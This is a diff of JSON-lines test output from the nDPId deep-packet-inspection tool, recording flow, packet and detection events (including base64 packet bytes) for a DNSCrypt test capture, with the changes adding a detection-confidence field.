+00697{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299356,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299355,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00697{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00697{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAIcBYVAAH4RyuMKAAABi2PeSMWpIPsCCCyCmlkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAXcBYYgAH4R5yIKAAABi2PeSJ22IPsGBPDSmlQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAXcBYcgAH4R5yEKAAABi2PeSMk1IPsGBMVRmlYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":488,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAABQBYYAuX4RC\/YKAAABi2PeSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":488,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAIcBYhAAH4RyuAKAAABi2PeSLJyIPsCCCyCmlcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":490,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAABQBYcAuX4RC\/UKAAABi2PeSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":490,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAIcBYlAAH4Ryt8KAAABi2PeSOgIIPsCCCyCmlUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
